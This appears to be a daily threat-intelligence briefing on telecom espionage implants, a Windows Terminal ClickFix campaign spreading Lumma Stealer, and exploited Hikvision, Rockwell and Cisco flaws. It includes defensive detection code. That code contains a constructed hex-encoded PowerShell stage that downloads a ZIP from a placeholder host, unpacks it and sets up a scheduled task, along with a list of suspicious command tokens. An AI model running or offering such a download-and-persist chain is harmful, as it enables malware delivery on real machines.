
Cyware Daily Threat Intelligence, March 06, 2026


Today's briefing covers state-level espionage against critical infrastructure alongside social-engineering lures that abuse trusted administrative tools. In South America, the China-nexus actor UAT-9244 has been observed targeting telecommunications providers with a trio of purpose-built implants.

Social engineering continues to weaponize trusted system utilities, as seen in a new ClickFix campaign that relies on the Windows Terminal app rather than the Run dialog. By instructing victims to paste and execute hex-encoded commands directly in the terminal, attackers sidestep detections tuned to Run-dialog launches and deploy Lumma Stealer.

The persistent risk of legacy vulnerabilities remains a critical concern for industrial and physical security, with CISA adding two long-standing flaws in Hikvision and Rockwell Automation to its KEV catalog. CVE-2017-7921 and CVE-2021-22681 are currently being exploited to bypass authentication and escalate privileges in sensitive environments.

Top Malware Reported in the Last 24 Hours

UAT-9244 targets South American telecoms

UAT-9244 is a China-nexus APT actor that has been targeting South American telecommunications infrastructure since 2024. The group employs three primary malware implants: TernDoor, PeerTime, and BruteEntry. TernDoor, a variant of the CrowDoor backdoor, is loaded via DLL side-loading and ships an encrypted Windows driver used for process management. PeerTime is an ELF-based backdoor that communicates over the BitTorrent protocol; it is built for multiple CPU architectures and receives commands through a peer-to-peer network, so there is no single C2 address to block. BruteEntry is a brute-force scanner that turns compromised devices into operational relay boxes (ORBs) for attacks against SSH, Postgres, and Tomcat servers. Each implant brings its own evasion and persistence techniques, pointing to a coordinated effort to compromise critical telecommunications systems.

Microsoft unveils new ClickFix malware campaign

Microsoft has disclosed a new ClickFix campaign that uses the Windows Terminal app to deploy Lumma Stealer. The lure instructs users to open Windows Terminal themselves, a context that looks more legitimate to the victim than the Run dialog and that sidesteps detections keyed to Run-dialog launches. Victims are guided into executing hex-encoded commands that kick off a multi-stage chain: the first stage downloads a ZIP payload, extracts its contents, and establishes persistence through scheduled tasks. Lumma Stealer then targets high-value browser artifacts, harvesting stored credentials and exfiltrating them to attacker-controlled servers. A secondary pathway downloads batch scripts to carry out further malicious actions. Because the hex-decoding step runs inside the shell the victim launched, process-creation telemetry for that shell still records the encoded command line.
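The detection angle for this campaign is that the encoded command still lands in process-creation telemetry: the shell spawned from Windows Terminal (or explorer.exe, for the classic Run-dialog variant) carries a long hex string that decodes to the real first stage. The following is an added example of that check, written for this briefing and not code from Microsoft or from the campaign itself. The event record, field names, file paths, hostnames and the stage-1 command are all constructed for the example; real telemetry would come from Sysmon Event ID 1, Windows Security 4688, or an EDR feed.

```python
import re
from dataclasses import dataclass

# Constructed process-creation record. The field names are this example's own
# simplification, not a Sysmon, Windows Security or EDR schema.
@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

@dataclass(frozen=True)
class Finding:
    severity: str
    parent: str
    decoded: str      # the plaintext recovered from the hex run
    tokens: tuple     # which suspicious markers were present in the plaintext

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Parents the two ClickFix lures produce: Windows Terminal (this campaign) and
# explorer.exe (Run dialog). Anything else is rated low but still reported.
LURE_PARENTS = {"windowsterminal.exe": "high", "explorer.exe": "medium"}
SUSPICIOUS_TOKENS = ("iwr ", "invoke-webrequest", "downloadstring", "expand-archive",
                     "schtasks", "http://", "https://", ".zip")
# 16 or more hex byte pairs in a row, not glued to other hex digits, so that
# GUID fragments and short hashes do not match.
HEX_RUN = re.compile(r"(?<![0-9a-f])((?:[0-9a-f]{2}){16,})(?![0-9a-f])", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_hex_runs(cmdline: str) -> list[str]:
    """Return the printable decodings of every long hex run in a command line."""
    decoded = []
    for m in HEX_RUN.finditer(cmdline):
        raw = bytes.fromhex(m.group(1))
        for enc in ("utf-8", "utf-16-le"):   # PowerShell lures use either
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
                decoded.append(text)
                break
    return decoded

def analyze(ev: ProcEvent) -> list[Finding]:
    """Flag shell launches whose command line embeds a hex-encoded stage."""
    if basename(ev.image) not in SHELLS:
        return []
    parent = basename(ev.parent_image)
    findings = []
    for text in decode_hex_runs(ev.command_line):
        hits = tuple(t for t in SUSPICIOUS_TOKENS if t in text.lower())
        if hits:   # a hex run that is just a hash decodes to nothing useful
            findings.append(Finding(LURE_PARENTS.get(parent, "low"), parent, text, hits))
    return findings

# Constructed stage-1 command (download, unpack, scheduled task), hex-encoded the
# way the lure would have the victim paste it. The URL is a non-resolving placeholder.
STAGE1 = ("Invoke-WebRequest https://example.invalid/pkg.zip -OutFile $env:TEMP\\pkg.zip; "
          "Expand-Archive $env:TEMP\\pkg.zip $env:TEMP\\pkg; "
          "schtasks /create /tn Updater /sc minute /tr $env:TEMP\\pkg\\run.bat")
STAGE1_HEX = STAGE1.encode("utf-8").hex()

# Constructed sample events; the Windows Terminal path is a placeholder, only the
# executable name is used.
SAMPLE_EVENTS = [
    # Victim pasted the lure into Windows Terminal: hex decoded in-process, then iex.
    ProcEvent(r"C:\Program Files\WindowsTerminal\WindowsTerminal.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell -c \"iex (-join (('{STAGE1_HEX}' -split '(..)' | ? {{$_}}) "
              f"| % {{[char][convert]::ToInt32($_,16)}}))\""),
    # Benign: a SHA-256 value is a long hex run but does not decode to a command.
    ProcEvent(r"C:\Program Files\WindowsTerminal\WindowsTerminal.exe",
              r"C:\Program Files\PowerShell\7\pwsh.exe",
              "pwsh -c \"(Get-FileHash .\\setup.msi).Hash -eq "
              "'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'\""),
    # Benign: ordinary shell use with no encoded content.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir C:\\Users"),
]

def scan(events: list[ProcEvent]) -> dict[int, list[Finding]]:
    return {i: analyze(ev) for i, ev in enumerate(events)}

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_EVENTS).items():
        for f in findings:
            print(f"event {i}: {f.severity} (parent {f.parent}) tokens={f.tokens}")
            print("  decoded:", f.decoded)
```

The decoded plaintext is what you want in the alert, not the hex: it gives the analyst the download URL, the drop path and the scheduled-task name in one line, and it is what a follow-on rule for the ZIP extraction and `schtasks` stages should be correlated against. Hex is only one encoding the lures use; the same structure works for Base64 (`-EncodedCommand`) runs if you swap the regex and decoder.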

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds flaws to KEV catalog

Two critical vulnerabilities affecting Hikvision and Rockwell Automation products have been added to the KEV catalog on evidence of active exploitation. The first, CVE-2017-7921, is an improper-authentication flaw in multiple Hikvision products that lets attackers escalate privileges and access sensitive information. The second, CVE-2021-22681, stems from insufficiently protected credentials in Rockwell Automation's Studio 5000 Logix Designer and the controllers it programs, enabling unauthorized users to bypass authentication and alter configurations. Both flaws are years old, so the practical question for most organizations is whether unpatched cameras and controllers are still reachable, not whether a fix exists; under BOD 22-01, federal civilian agencies must remediate KEV entries by the catalog's due date.
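The routine check prompted by a KEV addition is to match the catalog against an asset inventory and surface what is due. The following is an added example of that check, written for this briefing rather than tooling from CISA. The JSON excerpt uses the field names of the published KEV feed, but the dates, product strings and required-action text in it are constructed placeholders, as is the inventory; in practice you would fetch the feed from cisa.gov and read the inventory from your CMDB.

```python
import json
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed. Field names match the
# feed; the date, product and requiredAction values are placeholders for the example.
KEV_SAMPLE = json.dumps({
    "vulnerabilities": [
        {"cveID": "CVE-2017-7921", "vendorProject": "Hikvision", "product": "Multiple Products",
         "vulnerabilityName": "Hikvision Improper Authentication Vulnerability",
         "dateAdded": "2026-03-05", "dueDate": "2026-03-26",
         "requiredAction": "Apply mitigations per vendor instructions or discontinue use."},
        {"cveID": "CVE-2021-22681", "vendorProject": "Rockwell Automation",
         "product": "Studio 5000 Logix Designer",
         "vulnerabilityName": "Rockwell Automation Insufficiently Protected Credentials",
         "dateAdded": "2026-03-05", "dueDate": "2026-03-26",
         "requiredAction": "Apply mitigations per vendor instructions or discontinue use."},
    ]
})

# Constructed asset inventory: one IP camera, one engineering workstation, one
# database host that should not match anything above.
INVENTORY = [
    {"host": "cam-lobby-01", "vendor": "Hikvision", "product": "DS-2CD2032"},
    {"host": "eng-ws-07", "vendor": "Rockwell Automation", "product": "Studio 5000 Logix Designer"},
    {"host": "db-02", "vendor": "PostgreSQL", "product": "PostgreSQL"},
]

def load_kev(text: str) -> list[dict]:
    return json.loads(text)["vulnerabilities"]

def product_matches(kev_product: str, asset_product: str) -> bool:
    """KEV 'Multiple Products' entries apply vendor-wide; otherwise match by name."""
    k, a = kev_product.lower(), asset_product.lower()
    return k == "multiple products" or k in a or a in k

def match_kev(kev_text: str, inventory: list[dict], today: date) -> list[dict]:
    """Return one row per (asset, KEV entry) pair, with days left until the due date."""
    rows = []
    for entry in load_kev(kev_text):
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            if (asset["vendor"].lower() == entry["vendorProject"].lower()
                    and product_matches(entry["product"], asset["product"])):
                rows.append({
                    "host": asset["host"],
                    "cve": entry["cveID"],
                    "due": entry["dueDate"],
                    "days_left": (due - today).days,
                    "overdue": due < today,
                    "action": entry["requiredAction"],
                })
    return sorted(rows, key=lambda r: r["days_left"])

if __name__ == "__main__":
    for r in match_kev(KEV_SAMPLE, INVENTORY, date.today()):
        flag = "OVERDUE" if r["overdue"] else f"{r['days_left']}d left"
        print(f"{r['host']:14} {r['cve']:16} due {r['due']} ({flag}): {r['action']}")
```

Vendor-wide entries such as "Multiple Products" are the ones that bite: an inventory that records only a camera model string will not match a product name, so the check treats those entries as applying to every asset from that vendor and leaves the false positives to a human rather than silently dropping an exploited flaw.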

Actively exploited Cisco flaws

Cisco has confirmed active exploitation of two vulnerabilities in its Catalyst SD-WAN Manager software, tracked as CVE-2026-20122 and CVE-2026-20128. The first, with a CVSS score of 7.1, allows an authenticated remote attacker to overwrite arbitrary files; the second, scoring 5.5, allows an authenticated local attacker to escalate privileges. Both require valid credentials, so they are most useful to an attacker who already holds an account on the manager, for example one obtained through phishing or credential reuse. Cisco has released fixed software for the affected versions and reported a significant spike in exploitation activity on March 4, 2026, with much of it observed in the U.S. Separately, Cisco addressed two critical vulnerabilities in its Secure Firewall Management Center, both rated 10.0 on the CVSS scale.
